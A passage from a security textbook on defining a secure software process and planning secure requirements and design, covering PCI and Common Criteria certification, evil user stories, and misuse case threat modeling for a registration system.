Table 22.2  Bug bar example for tampering/repudiation Bug bar standard for tampering and repudiation Permanent modification of any user data in a common scenario that persists after restarting the OS/application. Permanent modification of any user data in a specific scenario, or temporary modification of user data in a common scenario. Temporary modification of data in a specific scenario that does not persist after restarting the OS/application.

Severity High Moderate Low

Following an evaluation, governments and larger organizations may require a certification and accreditation (C&A) process to approve the product for general deployment and use. A product may be certified after evaluation by an independent (non-development) group, which ensures all required standards have been met. After a product is certified, an accreditation authority may then approve the product for production and use. Accreditation is an administrative process to ensure that complete products, including all IT and non-IT parts, operate properly in their full operational environment [17]. Such accreditation ensures that the supply chain for a secure product is vetted.

22.2.3 Deployment, Operations, Maintenance and Disposal Configuration Management ensures a stable development and release process. Quality assurance or quality control tests software built via a formal release process, using configuration management. Software that is released to production should be built similarly, independent of the development environment. This process adheres to segregation of duties. During software release and deployment, care shall include that the software is properly configured, patched and monitored [15]. BSIMM requires that not only must an application be secured, but also its network and host computer must be optimized for security [4]. Highly secure server applications can be placed in their own application containers or physical or virtual machines and implementations should address basic cloud security, as appropriate. Deployment configurations shall be fully defined and documented, and code should be protected to ensure integrity. The client and server applications must be hardened as described in the Information Security and Network Security chapters. The configuration must be locked down, with configuration, environment, and data files not accessible to the user. The developed software should be patched when needed, in addition to regularly patching the software that the application relies on, such as operating system and database. Patched software should come with full documentation, including the reason(s) for the patch [2]. BSIMM recommends that while applications are actively deployed, attacks and logs need to be monitored, and discovered defects tracked for fixing by

408

22  Defining a Secure Software Process

development [4]. Plans for incident response and emergency response help to prepare for eventual software crises. During a crisis, it will be critical to access an inventory tracking which software is installed where. When the software product is retired, security considerations include archiving the data and program, sanitizing remaining media, and disposing of the software [15].

22.3 Secure Agile Development Agile software development is popular, and many translate agility to mean less time spent on documentation. However, secure software requires a secure process, attention to detail, documentation, and high quality. Agile development is wildly popular, but uses less structure than traditional software engineering. Here are some techniques to ensure security is integrated into the development environment [5, 20]: 1. Security training is even more important in this less structured environment. Define security roles. 2. Include Evil User Stories in every sprint, such as “As a hacker, I can send bad data in HTTP forms, so I can access and modify the database in unauthorized ways.” 3. Include risk analysis at the start of every sprint and whenever the product backlog changes. 4. Address Evil User Stories for every sprint feature/check-in, every sprint, every epic and every product release. Security features shall include authentication, access control, input validation, output encoding, error/exception handling, encryption, data integrity, logging and alarms, and data communication security for all applications. 5. Include some form of security-minded code review. This can happen with two pairs of eyes developing software together (i.e., pairs programming) or via a group review of critical code. 6. Agile is also known for test-driven development, which develops the test before the code, then writes code for the test. Most recently, automated testing using static and dynamic testing saves time and raises quality. Special methods include code analyzers and fuzz testing. Manual penetration testing is a great final step.

22.3.1 Designing Agile Style: Evil User Stories The format of an Evil User Story is: “As an I resulting in ” Examples of Evil User Stories are shown in Table 22.3, where example evil users, wrongdoings and issues can be mixed and matched to create a large set of potential issues, which then must be prioritized.

22.4  Example Secure Process: PCI Software Security Framework

409

Table 22.3  Sample mix and match evil user stories

Lazy employee Incompetent employee Evil employee Criminal Evil customer Thoughtless customer Foreign nation-state Evil hacker Hacktivist

Forget to… Incorrectly… Steal… Change... Impersonate… Mistakenly… Implant… Replay… Break…

Lost/incorrect… Deny… Sell… Change record … Obtain (service or info) Lost… Destroy… Demonstrate… Embarrass…

Table 22.4  Sample mix and match security stories

Nurse Manager Security staff System admin Database

Request documentation on Monitor Establish permissions Monitor Enforce

Prevent social engineering Detect fraud/collusion Prevent incorrect X Detect Prevent inappropriate use of…

Software system Programmer Tester Manager

Check… Validate … Test… Document info

Enforce Y regulation Prevent and log… Correct Z mistakes Enforce W policy

Once risks have been defined, vulnerabilities must be mitigated. The design of those defenses can be documented using Security Stories. Security Stories have the format: “As a I do to ensure ”. Sample roles, actions and conditions are listed in Table 22.4, which again can be mixed and matched. Table 22.5 shows some actual examples of Evil User Stories and Security Stories for Einstein University. An appropriate agile style also includes test cases to confirm proper implementation of the security stories. Depending on the complexity and sensitivity of the application, these secure agile techniques may be partially combined with requirements documentation techniques as specified in Chap. 23.

22.4 Example Secure Process: PCI Software Security Framework Perhaps one of the best ways to consider how to build secure software is to consider a successful and mature security standard for secure software. Here we evaluate the Payment Card Industry (PCI) Software Security Framework (SSF) [2], which is a

22  Defining a Secure Software Process

410 Table 22.5  Evil user stories for Einstein University Evil user story As a failing student, I use a password dictionary to break into a professor’s grades to change my grade. As a budding script kiddie, I try different hacking tools on university websites for fun.

Corresponding security story As a system administrator, I require passwords to be 12 characters long and lock out accounts after 6 invalid attempts, to prevent password guessing. As a system administrator at the university, I monitor illegal accesses, note their IP addresses, find offending students and charge them. As a network administrator, I partition the confidential zone within the firewall and monitor for specific, legal protocols to prevent exfiltration of data.

As a criminal cyber-hacker, I try to break into student accounts to learn their social security and credit card numbers. As a professor with a grant, I As a financial officer in charge of am too busy to be careful that grants, I review grant expenses to ensure the money I spend is according they are in line with the approved grant. to my grant contract.

Test case Case 1: Test learning Mgmt system (LMS) login system Case 2: Test LMS attack logs

Case 3: Test firewall configuration Case 4: Test registration login system Case 5: Test grant budget vs. expense report

standard to certify software and/or devices that transmits payment card information. While most companies avoid the certification process by using pre-built certified third-party software to perform this single function (and developing the wrapper and remaining code independently), legally the software vendor is ultimately responsible for the security of their software product, regardless of the third-party software they use. Responsibility for security must be clearly divided between the software vendor/ builder and any third-party software provider within contracts, so the use of PCI-­ certified code for payment card transactions helps to alleviate concerns. The software vendor is responsible for ensuring the contract clearly defines security responsibilities to each party (including code reviews, testing, hosting, and installation) and also for periodically ensuring that those responsibilities are met. The PCI Software Security Framework is used to certify software to handle payment card transactions. Two standards include Secure Software Lifecycle Requirements and Assessment Procedures [2], which describes requirements to the secure software development process, and Secure Software Requirements and Assessment Procedures, which describes feature requirements. This section provides an overview of the first document [2]. An overview of the second document is discussed in the next chapter, covering design details. The first area of concern for PCI is security governance, with two objectives of allocating security responsibility and defining software policy and strategy. Responsibility for secure software must be assigned by senior management to someone who has sufficient authority to enforce security policy and who reports back periodically with metrics relating to security goals and strategy. Policy ensures that an inventory of security standards and regulation is maintained at least annually. The organization shall also adopt a secure industry-standard

22.4  Example Secure Process: PCI Software Security Framework

411

process (e.g., BSIMM, ISO/IEC 27034, or OpenSAMM) to build security in throughout the software lifecycle. This process establishes checkpoints to ensure security requirements are met, potentially by using agile ‘stories’, change management, code reviews, testing, and/or release criteria. These processes (or checkpoints) are then tracked through performance measurement with the goal of quantifying and reducing vulnerability to security attacks. Developers maintain updated security training specific to the jobs they perform (e.g., whether design, coding, or testing) and perform their assigned security responsibilities, accordingly. PCI’s second focus area is threat and vulnerability identification. The first part of a risk assessment is for developers to classify critical assets for confidentiality, integrity and availability. Secondly, software threats shall be evaluated using frameworks, such as SANS or MITRE, or other sources, including industry risk, internal assessment, and/or academic papers. Part of the risk assessment must include an evaluation of third-party or open-source code for vulnerabilities. Decisions on whether/how threats and vulnerabilities are mitigated shall be justified, documented, and approved by appropriate levels. A means to assure security controls are effective may include risk management documentation, feature lists, rigorous testing, monitoring of live systems, and/or a bug bounty program. PCI-mentioned security features, potentially useful for feature lists, include multi-factor authentication, logging and input validation. Security testing is performed throughout the lifecycle, including after software release, and includes testing of third-party software. Tests are explicitly defined, including required configurations. An inventory of tests includes documentation describing when and which tests were run, testing results, and identified vulnerabilities. When vulnerabilities are found, they are rated (with justification) for severity and criticality, and fixed before release, unless justified through an exception process. Defects shall be fixed and patched in a timely manner in released and production software. PCI’s third concern is secure data management, which includes change management, and data and integrity protections. Configuration management tracks all defects and changes to code including documenting the security impact of a feature, what changes were required, who made the changes, and who authorized its release. Configuration management also includes a version control feature, which tracks files in each release. Configuration management protects software against unauthorized changes, through tracking all code check-out and check-in processes. Managing changes to software helps to secure intellectual property, ensure fixes carry through new releases, and manage third-party software. Integrity checks, digitally signed certificates and periodic configuration management audits are useful to detect unauthorized changes to software. Specific elements of payment card information are processed, stored, transmitted and handled in a minimal way, according to documented business need. Restricted access control privileges and strong encryption protect access during processing; thereafter any traces of the data are deleted and rendered irretrievable. Production data must always be protected, and shall not be accessible for debugging, testing, or

412

22  Defining a Secure Software Process

troubleshooting. There is a clear process and inventory for tracking and approving the use of sensitive production data. PCI’s fourth area of concern is secure communications, including evaluating third-party software, guiding software delivery to stakeholders, and maintaining commercial software. The software developer/vendor or service provider must provide sufficient information to their customers/stakeholders, to ensure that the system is securely installed, configured and managed. During installation, the proper libraries must be installed, including encryption and random number generators. During configuration/operation, customers must be able to create/delete accounts, change passwords and permissions, and enable/disable services or features. Vendor documentation must include detailed, secure installation and operation instructions, and document each configuration and security-related option. The documentation must be reviewed and updated annually or when changes occur, and updates must be communicated to customers. Communication between software vendors and customers shall be two-way: vendors or service providers must maintain and support their software, and work with customers or installers to properly operate the software. Vendors must issue patches for vulnerabilities in a timely manner, with notifications and directions for installation. The notifications shall include a description of the changes and the areas of impact of the change, so that customers can make informed decisions of when to implement the fix. If a fix is not yet available, any security workarounds should be explained through such notifications. In addition, software vendors shall provide an email address for external communications, such as reported bugs from the research community (or a bug bounty program.) The certification process itself is rigorous, and involves review of documentation, interviews and observations [2]. Required documentation during the certification audit includes threat and risk analysis, software architecture and design documentation, configuration and metadata information, testing results and defect data, source code, and policy documentation. For more details on this standard, see PCI’s Software Security Framework: Secure Software Lifecycle: Requirements and Assessment Procedures [2].

22.5 Security Industry Standard: Common Criteria In addition to the payment card industry’s PCI standard, other businesses may also require software certification, such as defense contracting. These contracts may require that products operate according to security regulation or industry standards, such as International Standards Organization (ISO), Common Criteria, Payment Card Industry (PCI) Software Security Framework, or the American government standard, National Institute for Standards and Technology (NIST). NIST sources include a free series of documents for security implementation.

413

22.6  Questions and Problems

Standards have been developed to certify IT and/or security products. Common Criteria (CC) (www.commoncriteriaportal.org) developed a standard for product development and testing, with a rating system between one and seven [21]. Common Criteria has certified access control devices, biometric devices, databases, smart card systems, key management systems and more [22], and is now the international standard ISO/IEC 15408. ISO/IEC 15408, entitled Information security, cybersecurity and privacy protection— Evaluation criteria for IT security, is a comprehensive, world-respected standard. CC was developed as an international standard, which includes a number of member countries. Some nations in Europe, for example, use CC to certify devices as privacy-compliant. CC replaces the Rainbow Series (including the Orange Book or Red Book) in American government contracts.

22.6 Questions and Problems 1. Vocabulary. Match each meaning with the correct word. Bug bar Sandbox Jail

Reliability test Static analysis Accreditation Security story Segregation of duties

Fuzz test Certification Maturity model Satellite Version control

Evil user story Secure Software Group Configuration management Penetration test

(a) An operating system imposes resource limits on a program, to limit I/O, disk and network resource consumption. (b) A threshold level of security flaws is defined. Before release, software must meet this threshold. (c) This tool develops random input to test handling of exceptions and incorrect input. (d) This test technique ensures that software can survive unusual conditions, such as faults, errors, loading and low resources. (e) A test for untrusted programs, which quarantines the software to observe actions. (f) A technique used in agile development to describe an attack. (g) A technique used in agile development to describe how to counter an attack. (h) A method of measuring the sophistication level of the software development process for handling security issues. (i) A department which leads security reviews and develops secure software and standards. (j) A member of a development group with an interest or role in security guidance. (k) This test uses inappropriate authorization to attempt to break into software.

414

22  Defining a Secure Software Process

(l) A system that tracks changes to software including impact, including what changes were required, who made the changes, and who authorized its release. (m) A feature of configuration management tracks files in a particular software release (n) The development, test and production environment use separate software and test data library systems. 2. Evil User Stories: Input. For your selected case study industry, prepare five evil user stories that involve attacks to input. Also prepare their corresponding security stories. 3. Evil User Stories: Authentication. For your selected case study industry, prepare three evil user stories that involve attacks to authentication or access control. Then prepare corresponding security stories. 4. Secure Software Audit. For a PCI DSS incident response case for a large breach, what documentation should an auditor look for to confirm that the software development does follow PCI DSS Software Security Framework requirements, as described in this chapter? 5. Legal Decision. A manager swears in court that they do security planning as part of their agile style development. However, there is no written policy and no existing design documents. There are automated tests but no maintained test results. If you are the judge, would you find the organization negligent? Provide written arguments supporting your decision. 6. Find Process Flaws. A customer reports that the customer website is vulnerable to SQL attacks. What went wrong during the development stages, as well as the development process, that allowed this flaw to be released? 7. Web Programming Protections. What security practices would you recommend for a web programmer? Consider each development stage: requirements, analysis/ design, coding, testing and deployment. 8. Fuzz Testing. Contrast two fuzz testers (or other testing tools) for the features supported.

22.6.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study, Security Workbook and Health First Requirements Document should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Note that the Optional Extensions listed as case studies below are extensions to the named case study. It is recommended that you perform the original case study, or at least read the case study all the way through, before designing the Extension.

References

Case study Update requirements document to include segregation of duties Fraud: Combatting social engineering optional extension: Computerizing the disclosure forms Planning for incident response Optional: Software design for incident detection Defining security metrics Optional: Designing metrics for the requirements doc HIPAA: Including privacy rule adherence to requirements document Application controls: Extending requirements preparation by planning for HIPAA security rule

415 Health first case study √ √ √ √ √ √

Other resources Health first requirements document Health first requirements document HIPAA slides or notes Health first requirements document Health first requirements document HIPAA slides or notes requirements document HIPAA slides or notes requirements document

References 1. Baker W (2022) Baker vs. Twitter Complaint, Case 2:22-cv-06525 Document 1 Filed 09/13/22, https://s3.documentcloud.org/documents/22418476/baker-­v-­twitter-­complaint.pdf 2. PCI (2021) Payment card industry (PCI) software security framework: secure software lifecycle requirements and assessment procedures, v. 1.1, Feb 2021. www.pcisecuritystandards.org 3. PCI (2021) Payment card industry (PCI) software security framework: secure software requirements and assessment procedures, version 1.1, Apr 2021. www.pcisecuritystandards.org 4. BSIMM (2020) Building security in maturity model, version 11, Sept 2020 5. OWASP (ND) OWASP Software Assurance Maturity Model (SAMM) version 2. 6. Dukes L, Yuan X, Akowuah F (2013) A case study on web application security testing with tools and manual testing. In: Proceedings of IEEE Southeastcon. Inst. Electrical & Electronics Eng. (IEEE), http://ieeexplore.ieee.org, pp 1–6 7. Larson D, Liu J (2013) A new security metric for SOA implementation. In: Seventh international conference on software security and reliability companion. IEEE Computer Society., http://ieeexplore.ieee.org, pp 102–108 8. SAFECode (2011) Fundamental practices for secure software development, 2nd edn. Software Assurance Forum for Excellence in Code. 8 February 2011, www.safecode.org, pp 1–56 9. SANS (2009) Practical risk analysis and threat modeling spreadsheet. http://cyber-­defense. sans.org/blog/2009/07/11/practical-­risk-­analysis-­spreadsheet. Accessed 6 Dec 2014 10. Payne RS (2013) A practical approach to software reliability for army systems. In: 2013 proceedings of the annual reliability and maintainability symposium (RAMS). IEEE, pp 1–5 11. Open Group. CDSA and CSSM, Vers 2.3 (with Corrigenda) technical standard. Doc. # C914 12. Christey S (2011) 2011 CWE/SANS top 25 most dangerous software errors. 13 Sept 2011. http://cwe.mitre.org/19 13. Kulkarni D, Tripathi A (2010) A framework for programming robust context-aware applications. IEEE Trans Softw Eng 36(2):184–197 14. Simpson S (ed) (2011) Fundamental practices for secure software development, 2nd edn. SAFECode. 8 Feb 2011. http://www.safecode.org/publication/SAFECode_Dev_ Practices0211.pdf. Accessed 15 Nov 2014

416

22  Defining a Secure Software Process

15. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill Co., New  York, pp 1094–1111 16. Sullivan (2014) Security brief: add a security bug bar to Microsoft team foundation server 2010. MSDN Magazine. http://msdn.microsoft.com/en-­us/magazine/ee336031.aspx. Accessed 7 Jan 2014 17. Common Criteria (2022) Common Criteria for Information Technology Security Evaluation: Part 1: Introduction and general mode, Rev. 1. Nov 2022. From: https://www.commoncriteriaportal.org 18. Chess B, Arkin B (2011) Software security in practice. IEEE Secur Priv 9(2):89–92 19. OWASP (2014) Agile software development: don’t forget EVIL user stories. https://www. owasp.org/index.php/Agile_Software_Development:_Don%27t_Forget_EVIL_User_Stories. Accessed 28 Nov 2014 20. Puhakainen A, Sääskilaht J (2012) Mastering security in agile/scrum, case study. http://www. rsaconference.com/writable/presentations/file_upload/asec-­107.pdf. Accessed 28 Nov 2014 21. Conklin WA, Shoemaker D (2014) CSSLP® certification all-in-one exam guide. McGraw-Hill Education, New York, NY 22. Common Criteria (2023) Common Criteria: Certified Products. From: https://www.commoncriteriaportal.org/products/ taken 3 November 2023. 23. PCI Security Standards Council (2013) Requirements and security assessment procedures, v 3.0, Nov 2013. www.pcisecuritystandards.org

Chapter 23

Planning for Secure Software Requirements and Design with UML

Computers have a strange habit of doing what you say, not what you mean. – CWE/SANS Top 25 Monster Mitigations [1]

It is not possible to build an excellent software product quickly without understanding the requirements. Sometimes security is added at the end of the project, after the main software is functional. It is known in the security world (and required by GDPR) that “Building Security In” is the best approach to secure software. In fact, that is part of the name of the maturity model: Building Security In Maturity Model (BSIMM). By Building Security In, the code is written properly the first time, saving time in the long run. At this basic level, BSIMM recommends risk analysis to rank threats. At the intermediate level, organizations shall also institute approved methods of architectural analysis, such as methods described by this chapter [26]. This chapter builds on the Unified Modeling Language (UML), commonly used in design. UML, and the models described here, can offer a high-level overview of security controls. Because “a picture is worth one thousand words,” it is possible to diagram, refine and communicate a security design easily. This re-iteration and review process enables a design to be well thought through for its first iteration of code release. It is recommended to explain diagrams with text, to help thoroughly think through issues. Remember that any flaws you find in the design stage reduce rewrite time in the coding and test stages. (The author can testify to rethinking and redrawing the diagrams in this chapter again and again!) In addition, security documentation is required for certification, helpful in preventing and arguing legal issues, and can be reused for similar future projects. If the reader has not yet developed expertise in UML, an introduction to each UML diagram is discussed before describing the security enhancements to UML. This chapter first describes useful security principles used in design. Then an example registration application is designed, using secure UML, for the requirements and design stages. Finally, the design requirements for PCI DSS-certified software is briefly outlined.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_23

417

418

23  Planning for Secure Software Requirements and Design with UML

23.1 Important Concepts and Principles in Secure Software Design There are a set of important principles for secure software design.

Usability

Authorisation

Efficiency

Fortification

•Psychological acceptability •Trust relationship •Least astonishment •Least Privilege •Complete mediation •Fail Safe/Fail Secure •Modularity, Encapsulation, Abstraction •Open Design •Economy of Mechanism: Simplicity of Design •Reduce attack surfaces •Least Common Mechanism: Separation, Isolation •Layering: Defense in Depth

The first area, Usability, is the goal that users are willing to use the secured software. Usability  This principle, also known as Psychological Acceptability, states that security implementations should not make a resource more difficult to use than an implementation without security [2, 3]. In other words, there must be a balance between usability and security. If security makes a product too difficult to use, users will find workaround ways to accomplish their goals. Shadow IT is where users use (for example) unsecured cloud services, instead of the app that was designed for them. Trust Relationship  The system, including all information and security mechanisms are considered safe. To transact, a user must feel they are working with a safe organization, safe network, and safe computer systems. If any of these are lacking, the user may postpone the transaction until conditions are right, or look elsewhere. The additional principle of Transitive Trust states that if A trusts B, and B trusts C, then A trusts C [3]. This concept is used by different levels of Certificate Authorities to enable trust with digital certificates. Least Astonishment  Security mechanisms should be understandable to users and work effectively within users’ activities [3]. Some security features (e.g., passwords) may be a bother, but users understand the need and how the functions work.

23.1  Important Concepts and Principles in Secure Software Design

419

The second goal, Efficiency, centralizes control of security to prevent use of a hodgepodge of similar controls, providing differences in effectiveness. Economy of Mechanism or Simplicity of Design  Security mechanisms should be as simple as possible in implementation (or programming or testing) [2, 3]. If a mishmash of security features is used, then attackers can (and do) find alternative ways to enter and take advantage of the weakest link. For example, it is not useful to have many authorization mechanisms; instead it is useful to have one excellent multifactor implementation that all services use. Therefore, security is generally implemented within one standardized security package’s Application Programming Interface (API), which is carefully vetted and patched, when necessary. This focus on one good implementation is also efficiently implemented from the programming perspective. Abstraction, Modularity, Encapsulation  To implement Economy of Mechanism, it is important to encapsulate security features, in a modular way. Modularity enables program reuse, with little to no customization for different applications [6]. Encapsulation hides attributes and the logic of methods within objects. Abstraction provides access to interfaces, defined only as method signatures, and enabling multiple implementations for different devices or systems, as necessary. Abstraction enables a selection of similarly-interfaced modules, potentially through inheritance. Fortunately, modular, encapsulated code is a simple method of coding, enabling code reuse. Here are two applications: • Software design: Modularity tries to model the real world, by defining classes (or packages) to represent a single concept [7]. It hides logic within the class; encapsulation hides class attributes and logic behind a class method interface; if fixes or enhancements need to be made, attributes can be changed and methods reprogrammed, but method signatures remain unaffected to avoid changes to existing calling programs. This enforces simplicity, since the logic within a class does not need to be understood by calling programs. • Security design: Modularity hides security functions within the security software. Attributes and internal security code do not need to be understood by software developers, who can simply use the provided, secured features, in a simple way. Open Design  This principle assumes the attacker knows your system: the algorithm is known, whether through espionage, reverse engineering and/or research [2, 3]. The system must be strong enough that even when the attacker has the code, they cannot break in. An example of this is encryption algorithms (AES, RSA) and integrity algorithms. These algorithms have been publicly studied for years, and their security status is known and relied upon. The third goal, Authorization, provides access only to allow persons to do their primary job and no more. These were introduced fully in Chap. 21 on Software Threats and Vulnerabilities, and are reviewed here:

420

23  Planning for Secure Software Requirements and Design with UML

Least Privilege  In the software world, least privilege provides program and the user the minimum possible required privileges at time of execution [2, 3]. Complete Mediation  Access rights are completely validated every time an access occurs [2, 3]. Fail Secure Default  Security policy defines that a subject is given explicit access to an object, only when access is explicitly defined, and that authorized use of data and control is restricted by security mechanisms (even when they are not fully functional) [2, 3]. The final goal of Fortification ensures that security is robust: Reduce Attack Surfaces  Risk analysis attempts to mitigate vulnerabilities, by minimizing their impact or frequency, or by avoiding risky behavior altogether (e.g., not saving confidential data). Least Common Mechanism or Minimization of Implementation  It is important to separate and isolate services from each other, by not sharing devices [2, 3]. If system A is broken into and that system is not separated and isolated, it will be easy to break into other systems on the same device or network zone. Thus, multiple services sharing a device can lead to additional, shared vulnerabilities and provide opportunities for attackers to abuse one service to springboard attacks into other services. Here are two applications: • Network Security: Different zones, physical servers and virtual machines separate systems from each other. (See chapter on Secure Networks.) • Software Security: Reduce features to bare minimum required (including in third party software); separate commercial code from development and test code; separate permissions for code development by project; put unrelated project files in separate, protected directories [8]. Defense in Depth or Layering  Layering of defenses ensures that if an attacker penetrates one layer, they are stopped by the next layers. Layers of software defenses may include: authentication, access control, logging, code reviews, input validation, vulnerability tests, etc.

23.2 Evaluating Security Requirements The purpose of the Requirements Stage is to determine what the product to be developed will do, who will be using it, and why it is being developed [24]. This stage involves interviewing the customer to find out how the software should look, act and perform; developing a prototype; or may include developing a requirements document, which serves as a contract between the software developers and the customer.

23.2  Evaluating Security Requirements

421

Fig. 23.1  Registration use case diagram

Register Client Enter Feedback

Send Email Update Provider

This chapter provides an example of a simpler application of a registration system, which distributes documentation or source code to any person who registers for it. Figure 23.1 shows a simple UML Use Case Diagram for the registration system. In this figure, a Client actor Registers for documentation by entering their name, email and job function, and can Send Feedback after they receive the documentation. The Provider actor may Send Email to the Clients, notifying them of any updates to the documentation. In a Use Case Diagram, actors, who are shown as stick figures with identifier labels, are the planned users of the system [4]. The diagram also shows ovals, called Use Cases, which lists one basic user feature each. Now that you understand the basic demo application, we will proceed with designing requirements for it. The first step is risk analysis. The OCTAVE Security Requirements Process defines how risk analysis (also known as threat modeling) can be performed for software. (OCTAVE is an abbreviation for Operationally Critical Threat, Asset and Vulnerability Evaluation.) OCTAVE steps include [12]: 1 . Identify critical assets 2. Define security goals 3. Identify threats 4. Analyze risks 5. Define security requirements

23.2.1 Step 1: Identify Critical Assets The first step, Identify Critical Assets, is concerned with describing the assets (e.g., data) that the software will be working with. Figure 23.2 shows a Business Process Model (or Activity Diagram) for the Registration System, split into two parts to

422

23  Planning for Secure Software Requirements and Design with UML

Registration System Client

Administrator

Enter Menu Selection

Enter Menu Selection

Enter comments

Enter contact info

Generate email for all contacts Generate list of comments Contact Info

Comments Info

Provide links to materials

Edit contact info

Comments Info

Phase

Documents

Fig. 23.2  Business process model for registration system

demonstrate a flow chart for each of the two actors, Client and Administrator. The solid bullet is where each user starts, and each actor performs the activities (shown as rounded-corner rectangles) in order as the arrows indicate. Notice that the data, shown as squared-off rectangles, are either created or accessed by the actors. When the arrow points to the data, the data is created or modified, whereas if the arrow points to the process, the process is reading the data. In any case, the assets considered during this risk assessment are the data shown in Fig.  23.2, and includes Contact Information, Materials and Comments. This represents the ‘Contact’ registration information (name, email, job function), ‘Materials’ to be distributed, and feedback ‘Comments’, respectively.

23.2.2 Step 2: Define Security Goals The second OCTAVE step, Define security goals, considers how the three security goals: confidentiality, integrity and availability each relate to the three data assets of the Registration System. In Table 23.1, each data is rated from 1–3 to represent low (*), moderate (**) and high (***) for each security goal. For this example, we want

423

23.2  Evaluating Security Requirements Table 23.1  Define security goals Assets Contact info Materials Comments

Confidentiality ** No PII maintained * Public with login ** Confidential pref.

Integrity *** Require accurate list of interested persons *** Accurate – tamper-proof *** Accurate – tamper-proof

Availability * Weekly backup ** 24/7 preferred * Weekly backup, email

to distribute the materials to the public (preferably with their registration), so the requirement for Confidentiality of Materials is rated low = 1. However, we would like the materials to be accurate, so the requirement for Integrity of Materials is rated high = 3. Availability for the materials is important. However, if the registration system is down for a couple days, since the materials are free, there is reputational but no financial loss. Therefore, the requirement for Availability of Materials is rated moderate = 2.

23.2.3 Step 3: Identify Threats The third OCTAVE step, Identify threats, considers what threats the software may be vulnerable to. It is important to consider adversaries, and what they are interested in. One simple threat model considering technical attacks is the STRIDE threat model, where each letter in STRIDE represents a threat to consider (S=Spoof identity, T  =  Tamper with data, R  =  Repudiation, I=Info Disclosure, D=Denial of Service, E = Elevation of Privilege [27]. The Open Threat Taxonomy, published by Enclave [5], is a more comprehensive threat model also considers errors, failures, and non-technical issues. Its abbreviated, diagrammed version is shown in Fig. 23.3. Table 23.2 lists other, more extensive databases of threats and vulnerabilities maintained by MITRE.  One more extensive threat model is provided by The Common Attack Pattern Enumeration and Classification (CAPEC™) initiative (https://capec.mitre.org). Table  23.2 summarizes its categories. Their Common Weakness Risk Analysis Framework recommends prioritizing weaknesses specifically for individual software projects, from their accumulated weakness list. An organization should therefore prioritize and address its highest priority risks. After gaining an understanding of threats, we apply them to the Registration System in Fig. 23.4. This MisUse Case Diagram is an extension of the primary Use Case Diagram, which also shows the attacks a cracker or fraudster may use to threaten the system. The MisUse Case Diagram names attackers, called Misusers, and black MisUse Cases ovals, to name potential attacks [13]. The dotted arrows point from the MisUse Cases to the Use Cases they . MisUse Cases

23  Planning for Secure Software Requirements and Design with UML

424

Shortage: Lack of skills, personnel, disruption

Supplier failure

Logistics disrution or failure

Errors: mistakes, negligence, inaction, social engineering Loss of property

Personnel Threat

Disruption: Water, fuel, materials, electricity, transportation, emergency, communications

Resource Threat

Theft of property Property Loss

Threats (Enclave Security)

Privilege abuse: misuse, escalation, abuse

Denial of Service Application exploitation: input, code injection, Misuse/ command injection, manipulation: API abuse fuzzing, referese engineering, memory, cache, tech device resource location guessing authentication bypass, path traversal, source code modification

Technical Threat

Tech services manipulation

Physical Threat

Failure: utilities, electronic media, facility, HVAC

Destruction of property: accidental, natural

Destruction of property: intentional, sabotage, vandalism

Credential discovery: open source, guessing, sniffing, cracking Fingerprinting: open sources, sniffing, scanning Information leakage: theft, cryptanalysis, sniffing, debugging, key logging, misdelivery Data modification: transmission, data at rest, replay

Fig. 23.3  Open threat taxonomy, version 1.1, Enclave Security [5] Table 23.2  Table of vulnerability databases Threat models Common Vulnerability Enumeration (CVE) Common Weakness Enumeration (CWE) Common Attack Pattern Enumeration and Classification (CAPEC)

Description The purpose is to “identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.” Catalogs and describes close to 200,000 vulnerabilities. https://cve.mitre.org/ Lists the top 25 most dangerous weaknesses in software: https://cwe. mitre.org/top25/archive/2022/2022_cwe_top25.html The goal is a “comprehensive dictionary of known patterns of attack employed by adversaries to exploit known weaknesses in cyber-enabled capabilities.” This site catalogs 560 attack patterns divided into categories of software, hardware, communications, supply chains, social engineering and physical security. https://capec.mitre.org/

are labeled similar to Use Cases in ‘Verb Noun’ or ‘Verb Adjective Noun’ form, such as ‘Launch DOS’ or ‘Change Valid Data’. In original versions of the diagrams, users and misusers were different colors. Since color-coding users could be interpreted as racist (although that is likely not what the original authors intended), we have chosen a different coding. In this book, users are solid and misusers are striped. These diagrams were easily drawn with Microsoft Visio, within the category of UML Class Diagrams, modified to add more shapes, then selecting “Software and Database” -> Software-> UML Use Case Diagram.

23.2  Evaluating Security Requirements

425

Circumvent Registration

Enter Client Info

Enter invalid registration Deviant Client

Client

Enter Feedback



Launch DOS

Email Update

Provider

Attack SQL

Attacker

Fig. 23.4  Registration MisUse case diagram

A Threat Tree may alternatively be used to investigate and document likely attacks [15], such as in Fig. 23.5. An advantage of developing such a Threat Tree is that they are portable to other similar products/environments. A good threat tree can be reused from one similar product to another, and need only be maintained as new threats, products, and/or environments arise. Figure 23.5 was drawn as a Microsoft Visio Brainstorming Diagram. As part of our Identify Threats stage, there are four main attacks we discuss in depth. One attack is that someone might obtain materials without registering, for example by searching the Internet for them. A second may be that they give false or incorrect identification information without properly registering for them. A third attack may be a Denial of Service, where an automated system registers random garbage quickly filling up our database with garbage registrants. A fourth problem might be an SQL attack, where an attacker adds SQL commands to our form input, to perform unintended database commands. It may be useful for more complex threats to outline how the attack could occur and will be mitigated. For each non-trivial misuse case, we can create one MisUse Case Description. The MisUse Case Description describes the steps of an attack [16], similar to how a Use Case Description may describe the steps of a normally executing process. Table 23.3 shows the detailed Launch Denial of Service MisUse Case attack. The Basic Path is a numbered outline of the steps of the attack. The Alternate Paths section describes slightly variant attack methods. The Mitigation Points section describes how we intend to defend against this attack type. Our

426

23  Planning for Secure Software Requirements and Design with UML DOS

Subvert system via file access

Availability

Fill DB resources Fail system with bug

SQL Attack

Registration Attack

Confidentiality Password Attack Bypass Registration

Friend provides link Search materials

Integrity

Invalid Registration SQL attack Cross site scripting

Fig. 23.5  Threat tree for registration system Table 23.3  Launch Denial of Service MisUse case MisUse case: launch denial of service Summary: An attacker issues repeated registrations, resulting in filling the database with fake data, and depleting system and file resources. Basic path: 1. Do forever 2.  The attacker requests a registration form 3.  The attacker sends random fake data in the form 4. Enddo Alternative paths: AP1. Repeat data is entered Mitigation points: MP1. At BP Step 2–3 use CAPTCHA in registration form to avoid bot attack. MP2. At BP Step 3 validate data: no duplicates, data type matching

